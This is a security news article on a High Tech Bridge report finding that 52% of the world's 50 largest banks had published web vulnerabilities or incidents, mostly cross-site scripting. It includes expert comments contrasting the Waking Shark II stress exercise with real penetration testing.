The report produced by High Tech Bridge (HTB), Hacking Banking Websites: Myth or Reality? looks at the world's 50 biggest banks, and simply counts those security incidents that have been reported or vulnerabilities that have been published somewhere on the internet. It is, by its nature, a very conservative report; for although it cannot be proven, it is generally accepted that banks do not report or disclose actual incidents themselves. Furthermore, the report does not include known DDoS attacks against the major banks. "We didn't take into account the more common DDoS attacks or phishing campaigns as they do not involve security of web application directly," says the report.
Nevertheless, as it stands the study shows 52% of the world's 50 largest banks have been impacted by one or more of the defined incidents.
However, Waking Shark II was not designed to test the banks' security, but the sector's ability to withstand stress and maintain operations in the face of a sustained security attack. HTB's research suggests that each bank also and individually needs to test its own website security.
This was a concern raised by David Harley, senior research fellow at ESET, about Waking Shark. "This kind of simulation can be very useful in terms of testing contingency plans, resilience of communication channels, adherence to procedures and protocols and so on, though it’s hard to simulate the sort of conditions of surprise and stress that prevail in a real crisis... What really tests an organization’s security," he continued, "is a breach that couldn’t have been anticipated, the sort of attack that demonstrates how well (or badly) it can expect the unexpected."
A real test, he suggests, is more likely to come from 'an external attacker – or a pseudo-attacker such as a pen-tester.' Interestingly, the first weakness that both a blackhat or ethical hacker is likely to seek is cross-site scripting – the very vulnerability that dominates HTB's research.
Ilia Kolochenko, HTB's CEO agrees. On the one hand, he told Infosecurity, exercises such as Waking Shark "are definitely useful and help to improve the general state of information security." But on the other hand, he added, "it is not so easy to reproduce the same conditions and same attack scenarios as blackhats will use. Therefore, while such types of event can help to avoid some risks, they will not stop blackhats who have brilliant imagination and apply creativity when planning new attacks."
Waking Shark was possibly testing the wrong area; or at least not testing a necessary area. "The statistics confirm that even financial institutions should pay more attention to their web application security, not only to protect their customers but to maintain their digital reputation," suggests the report.